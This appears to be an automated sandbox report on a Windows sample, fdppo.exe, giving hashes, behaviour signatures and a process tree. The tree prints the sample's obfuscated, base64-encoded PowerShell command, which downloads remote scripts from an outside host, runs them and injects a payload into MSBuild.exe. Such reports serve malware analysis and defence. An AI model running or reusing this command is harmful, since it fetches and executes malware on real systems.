Analysis

  • max time kernel
    143s
  • max time network
    144s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    13-07-2020 14:36

General

  • Target

    fdppo.exe

  • Size

    101KB

  • MD5

    082348ffb2977a0762e3e5d6f4a47ff4

  • SHA1

    a63f12bba792fd01307373a7565b96549eb9f3c8

  • SHA256

    8f9fcdd00e43b8845139ba38f9d4f164e526736578eab199e7f7af5d8179f01c

  • SHA512

    ac00b157a3ae8af9502658c2fa72d80eb871f4ca9ee6b36393c526fbe0d35383855633bc871623c3088f3cdbd75a537b52ef24d8d1995353896637c3a27cf91c

Score
3/10

Malware Config

Signatures

  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Program crash 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fdppo.exe
    "C:\Users\Admin\AppData\Local\Temp\fdppo.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3844
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwB6AC4AegB6AC4AaAB0AC8ATgBlADYANABvAC4AdAB4AHQAJwApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAqACIALAAgACIANAA4ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACAAIgA3ADgAIgApAHwASQBFAFgAOwBbAEIAeQB0AGUAWwBdAF0AJABmAD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJAByAGUAZwAsAFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBDAGEAbABsAFQAeQBwAGUAXQA6ADoATQBlAHQAaABvAGQALAAnAGgAdAB0ACcAKwBbAEMAaABhAHIAXQA4ADAAKwAnAHMAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AegAuAHoAegAuAGgAdAAvAFMAeABUAHAASQAuAHQAeAB0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
      2⤵
        PID:2968
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 696
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          • Program crash
          PID:2840

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2840-1-0x0000000004080000-0x0000000004081000-memory.dmp

      Filesize

      4KB

    • memory/2840-7-0x0000000004830000-0x0000000004831000-memory.dmp

      Filesize

      4KB

    • memory/2968-0-0x0000000000000000-mapping.dmp

    • memory/2968-2-0x0000000000000000-mapping.dmp

    • memory/2968-3-0x0000000000000000-mapping.dmp

    • memory/2968-4-0x0000000000000000-mapping.dmp

    • memory/2968-5-0x0000000000000000-mapping.dmp

    • memory/2968-6-0x0000000000000000-mapping.dmp